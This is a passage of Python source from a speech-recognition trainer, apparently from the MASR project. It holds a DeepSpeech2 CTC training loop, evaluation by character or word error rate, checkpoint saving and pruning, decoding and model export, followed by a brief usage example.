model.module.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt')))
else:
model.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt')))
optimizer.load_state_dict(torch.load(os.path.join(resume_model, 'optimizer.pt')))
with open(os.path.join(resume_model, 'model.state'), 'r', encoding='utf-8') as f:
last_epoch = json.load(f)['last_epoch'] - 1
print('[{}] Successfully restored model and optimizer parameters: {}'.format(datetime.now(), resume_model))
scheduler = StepLR(optimizer, step_size=1, gamma=0.93, last_epoch=last_epoch)
# Loss function
ctc_loss = torch.nn.CTCLoss(reduction='none', zero_infinity=True)
test_step, train_step = 0, 0
best_test_cer = 1
train_times = []
sum_batch = len(train_loader) * num_epoch
if local_rank == 0:
writer.add_scalar('Train/lr', scheduler.get_last_lr()[0], last_epoch)
try:
# Start training
for epoch in range(last_epoch, num_epoch):
epoch += 1
start_epoch = time.time()
start = time.time()
for batch_id, (inputs, labels, input_lens, label_lens) in enumerate(train_loader):
inputs = inputs.cuda()
labels = labels.cuda()
out, out_lens, _ = model(inputs, input_lens)
out = out.log_softmax(2)
out = out.permute(1, 0, 2)
# Compute the loss
label_lens = label_lens.cuda()
loss = ctc_loss(out, labels, out_lens, label_lens)
loss = loss.mean()
loss.backward()
optimizer.step()
optimizer.zero_grad()
train_times.append((time.time() - start) * 1000)
# In multi-GPU training only one process prints
if batch_id % 100 == 0 and local_rank == 0:
eta_sec = (sum(train_times) / len(train_times)) * (
sum_batch - (epoch - 1) * len(train_loader) - batch_id)
eta_str = str(timedelta(seconds=int(eta_sec / 1000)))
print(
'[{}] Train epoch: [{}/{}], batch: [{}/{}], loss: {:.5f}, learning rate: {:>.8f}, eta: {}'.format(
datetime.now(), epoch, num_epoch, batch_id, len(train_loader),
loss.cpu().detach().numpy(), scheduler.get_last_lr()[0], eta_str))
writer.add_scalar('Train/Loss', loss.cpu().detach().numpy(), train_step)
train_step += 1
train_times = []
# Also save the model every fixed number of steps
if batch_id % 10000 == 0 and batch_id != 0 and local_rank == 0:
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model.module, optimizer=optimizer)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model, optimizer=optimizer)
start = time.time()
# In multi-GPU training only one process runs evaluation and saves the model
if local_rank == 0:
# Run evaluation
model.eval()
print('\n', '=' * 70)
c, l = self.__test(model, test_loader, test_dataset.vocab_list, ctc_loss)
print('[{}] Test epoch: {}, time/epoch: {}, loss: {:.5f}, cer: {:.5f}'.format(
datetime.now(), epoch, str(timedelta(seconds=(time.time() - start_epoch))), l, c))
print('=' * 70, '\n')
writer.add_scalar('Test/Cer', c, test_step)
writer.add_scalar('Test/Loss', l, test_step)
test_step += 1
model.train()
# Log the learning rate
writer.add_scalar('Train/lr', scheduler.get_last_lr()[0], epoch)
# Save the best model
if c <= best_test_cer:
best_test_cer = c
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, model=model.module,
optimizer=optimizer, epoch=epoch, error_type=self.metrics_type, error_rate=c, test_loss=l, best_model=True)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, model=model,
optimizer=optimizer, epoch=epoch, error_type=self.metrics_type, error_rate=c, test_loss=l, best_model=True)
# Save the model
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model.module, error_type=self.metrics_type, error_rate=c, test_loss=l, optimizer=optimizer)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model, error_type=self.metrics_type, error_rate=c, test_loss=l, optimizer=optimizer)
scheduler.step()
except KeyboardInterrupt:
# Save the model when exiting with Ctrl+C
if local_rank == 0:
print('Please wait, the model is being saved...')
if nranks > 1:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model.module, optimizer=optimizer)
else:
self.save_model(save_model_path=save_model_path, use_model=self.use_model, epoch=epoch,
model=model, optimizer=optimizer)
# Evaluate the model
@torch.no_grad()
def __test(self, model, test_loader, vocabulary, ctc_loss):
cer_result, test_loss = [], []
for batch_id, (inputs, labels, input_lens, label_lens) in enumerate(test_loader):
inputs = inputs.cuda()
labels = labels.cuda()
# Run recognition
outs, out_lens, _ = model(inputs, input_lens)
out = outs.permute(1, 0, 2)
# Compute the loss
loss = ctc_loss(out.log_softmax(2), labels, out_lens, label_lens)
loss = loss.mean().cpu().detach().numpy()
test_loss.append(loss)
# Decode to get the recognition result
outs = torch.nn.functional.softmax(outs, 2)
outs = outs.cpu().detach().numpy()
out_strings = self.decoder_result(outs, out_lens, vocabulary)
labels_str = labels_to_string(labels.cpu().detach().numpy(), vocabulary)
cer_batch = []
for out_string, label in zip(*(out_strings, labels_str)):
# Compute the character or word error rate
if self.metrics_type == 'wer':
c = wer(out_string, label)
else:
c = cer(out_string, label)
cer_result.append(c)
cer_batch.append(c)
if batch_id % 10 == 0:
print('[{}] Test batch: [{}/{}], loss: {:.5f}, '
'{}: {:.5f}'.format(datetime.now(), batch_id, len(test_loader),loss,self.metrics_type,
float(sum(cer_batch) / len(cer_batch))))
cer_result = float(sum(cer_result) / len(cer_result))
test_loss = float(sum(test_loss) / len(test_loss))
return cer_result, test_loss
# Save the model
@staticmethod
def save_model(save_model_path, use_model, epoch, model, optimizer, error_type='cer', error_rate=-1., test_loss=-1., best_model=False):
if not best_model:
model_path = os.path.join(save_model_path, use_model, 'epoch_{}'.format(epoch))
os.makedirs(model_path, exist_ok=True)
torch.save(optimizer.state_dict(), os.path.join(model_path, 'optimizer.pt'))
torch.save(model.state_dict(), os.path.join(model_path, 'model.pt'))
with open(os.path.join(model_path, 'model.state'), 'w', encoding='utf-8') as f:
f.write('{"last_epoch": %d, "test_%s": %f, "test_loss": %f}' % (epoch, error_type, error_rate, test_loss))
last_model_path = os.path.join(save_model_path, use_model, 'last_model')
shutil.rmtree(last_model_path, ignore_errors=True)
shutil.copytree(model_path, last_model_path)
# Delete old models
old_model_path = os.path.join(save_model_path, use_model, 'epoch_{}'.format(epoch - 3))
if os.path.exists(old_model_path):
shutil.rmtree(old_model_path)
else:
model_path = os.path.join(save_model_path, use_model, 'best_model')
os.makedirs(model_path, exist_ok=True)
torch.save(model.state_dict(), os.path.join(model_path, 'model.pt'))
torch.save(optimizer.state_dict(), os.path.join(model_path, 'optimizer.pt'))
with open(os.path.join(model_path, 'model.state'), 'w', encoding='utf-8') as f:
f.write('{"last_epoch": %d, "test_%s": %f, "test_loss": %f}' % (epoch, error_type, error_rate, test_loss))
print('[{}] Model saved: {}'.format(datetime.now(), model_path))
def decoder_result(self, outs, outs_lens, vocabulary):
# Handling for the beam search decoder
if self.decoder == "ctc_beam_search" and self.beam_search_decoder is None:
try:
from masr.decoders.beam_search_decoder import BeamSearchDecoder
self.beam_search_decoder = BeamSearchDecoder(self.alpha, self.beta, self.lang_model_path, vocabulary)
except ModuleNotFoundError:
print('\n==================================================================', file=sys.stderr)
print('The paddlespeech-ctcdecoders library is missing, please install it as described in the documentation. On Windows, only ctc_greedy can be used.', file=sys.stderr)
print('[Note] Automatically switched to the ctc_greedy decoder.', file=sys.stderr)
print('==================================================================\n', file=sys.stderr)
self.decoder = 'ctc_greedy'
# Run decoding
outs = [outs[i, :l, :] for i, l in enumerate(outs_lens)]
if self.decoder == 'ctc_greedy':
result = greedy_decoder_batch(outs, vocabulary)
else:
result = self.beam_search_decoder.decode_batch_beam_search(probs_split=outs,
beam_alpha=self.alpha,
beam_beta=self.beta,
beam_size=self.beam_size,
cutoff_prob=self.cutoff_prob,
cutoff_top_n=self.cutoff_top_n,
vocab_list=vocabulary,
num_processes=self.num_proc_bsearch)
return result
def export(self, save_model_path='models/', resume_model='models/deepspeech2/best_model/'):
"""
导出预测模型
:param save_model_path: 模型保存的路径
:param resume_model: 准备转换的模型路径
:return:
"""
# 获取训练数据
audio_featurizer = AudioFeaturizer(feature_method=self.feature_method)
text_featurizer = TextFeaturizer(self.dataset_vocab)
featureNormalizer = FeatureNormalizer(mean_std_filepath=self.mean_std_path, feature_method=self.feature_method)
# Build the model
if self.use_model == 'deepspeech2':
base_model = DeepSpeech2Model(feat_size=audio_featurizer.feature_dim, vocab_size=text_featurizer.vocab_size)
else:
raise Exception('No such model: {}'.format(self.use_model))
# Load the pretrained model
resume_model_path = os.path.join(resume_model, 'model.pt')
assert os.path.exists(resume_model_path), "The model to resume from does not exist!"
base_model.load_state_dict(torch.load(resume_model_path))
print('[{}] Successfully restored model parameters: {}'.format(datetime.now(), resume_model_path))
base_model.to('cuda')
mean = torch.from_numpy(featureNormalizer.mean).float().cuda()
std = torch.from_numpy(featureNormalizer.std).float().cuda()
# Build the export model
if self.use_model == 'deepspeech2':
model = DeepSpeech2ModelExport(model=base_model, feature_mean=mean, feature_std=std)
else:
raise Exception('No such model: {}'.format(self.use_model))
infer_model_dir = os.path.join(save_model_path, self.use_model)
os.makedirs(infer_model_dir, exist_ok=True)
infer_model_path = os.path.join(infer_model_dir, 'inference.pt')
# script_model = torch.jit.trace(model, (torch.rand((1, audio_featurizer.feature_dim, 300)),
# torch.randint(high=100, size=(1,), dtype=torch.int32),
# torch.rand(size=(base_model.num_rnn_layers, 1, base_model.rnn_size),
# dtype=torch.float32)))
# torch.jit.save(script_model, infer_model_path)
torch.save(model, infer_model_path)
print("预测模型已保存:{}".format(infer_model_path))
``` |
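For orientation, here is a minimal sketch of how MASRTrainer is typically driven end to end; the paths and hyperparameters below are illustrative assumptions, not values taken from the repository.
```python
from masr.trainer import MASRTrainer

trainer = MASRTrainer(use_model='deepspeech2', feature_method='linear', decoder='ctc_greedy')

# 1. Build the manifests, vocabulary and mean/std statistics from the annotations.
trainer.create_data(annotation_path='dataset/annotation/')

# 2. Train; checkpoints are written under models/deepspeech2/.
trainer.train(batch_size=32, num_epoch=50, learning_rate=5e-5)

# 3. Evaluate the best checkpoint and export it for inference.
error_rate = trainer.evaluate(resume_model='models/deepspeech2/best_model/')
trainer.export(save_model_path='models/', resume_model='models/deepspeech2/best_model/')
```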